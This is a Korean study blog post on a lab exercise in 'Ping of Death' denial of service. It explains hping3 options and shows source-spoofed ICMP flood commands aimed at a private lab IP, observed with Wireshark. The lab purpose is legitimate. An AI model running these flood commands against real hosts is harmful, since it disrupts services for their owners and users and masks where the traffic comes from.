안녕하세요~ 지방토끼입니다.

오늘은 네트워크 보안 DoS-Ping of Death(죽음의 핑)에 대해서 공부해 보려고 합니다!

그럼 시작해 볼까요?

 

Kali IP : 192.168.15.100

Linux IP : 192.168.15.101

Windows IP : 192.168.15.102

 

DoS

- 서비스 거부 공격

- 자원을 고갈시키는 공격

 

(공격)

- Network : 대역폭 고갈

- System : CPU, Memory, Disk, Process 자원 고갈

 

(명령어)

# hping3 [옵션] [공격 대상]

 

(옵션)

-c : 패킷 수 지정

-d : 데이터 크기

--flood : 최고의 속도로 최대 생성

--fast : 초당 10 패킷

--faster : 초당 100 패킷

 

(IP 옵션)

-a : 출발지 IP 주소 변조

--rand-dest : 랜덤 목적지 IP 주소 변조

--rand-source : 랜덤 출발지 IP 주소 변조

 

(UDP/TCP 옵션)

-s : 출발지 포트 지정

-p : 목적지 포트 지정

-S : SYN flag

-F : FIN flag

-P : PSH flag

-A : ACK flag

-R : RST flag

-U : URG flag

-X : X-mas flag (0x40)

-M : TCP Sequence number

 

(모드 옵션)

기본값 : TCP 모드

-0 : IP 모드

-1 : ICMP 모드

-2 : UDP 모드

-8 : Scan 모드

 

 

Ping of Death(죽음의 핑)

- 패킷 크기 일정 크기(MTU) 보다 크게 생성해서 전송(공격)

- 규정 크기 이상의 ICMP 패킷으로 시스템을 마비시키는 공격

- IP

- ICMP

- TCP

- UDP

- Scanning

 

1. Ping of Death 공격(kali)

# hping3 --icmp -a 100.100.100.100 192.168.15.101 -d 65000 --flood

- 패킷 종류 ICMP, 출발지 IP주소 100.100.100.100 변조, 데이터 크기 65000, 최고의 속도로 최대 생성

 

 

 

2. wireshar & 시스템 정보 확인(Linux)

# wireshark &

# gnome-system-monitor

 

 

 

3. Ping of Death 공격(kali)

# hping3 --icmp --rand-source 192.168.15.101 -d 65000 --flood

- 패킷 종류 ICMP, 랜덤 출발지 IP 주소 변조, 데이터 크기 65000, 최고의 속도로 최대 생성

 

 

4. wireshar & 시스템 정보 확인(Linux)

# wireshark &

# gnome-system-monitor

 

 

 

 

 

 

 

 

.

.

.

.

.

.

 

오늘은 네트워크 보안 DoS-Ping of Death(죽음의 핑)에 대해서 공부해 보았습니다.!

읽어주셔서 감사합니다!

나쁜 용도로 쓰시면 안돼요!!

틀린 내용이나 부족한 부분이 있다면 댓글 부탁드려용!

 

 

 

 

+ Recent posts